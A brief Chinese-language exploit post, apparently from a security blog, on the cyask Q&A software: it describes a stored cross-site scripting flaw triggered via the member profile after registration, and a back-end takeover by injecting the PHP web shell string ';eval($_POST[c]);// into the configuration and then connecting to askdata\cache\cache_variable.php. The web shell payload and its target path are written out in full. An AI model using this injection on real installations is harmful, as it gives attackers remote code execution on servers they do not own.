cyask 前台xss与后台Getshell

by 0day5_saline 首先是注册一枚 xss 然后查看会员资料,发现xss已经成功的触发了 xss2 xs3 关于后台拿shell,在配置文件出插入 [php]';eval($_POST[c]);//[/php] 经过检查,只能插入四处 shell 插入后连接 askdata\cache\cache_variable.php

发表评论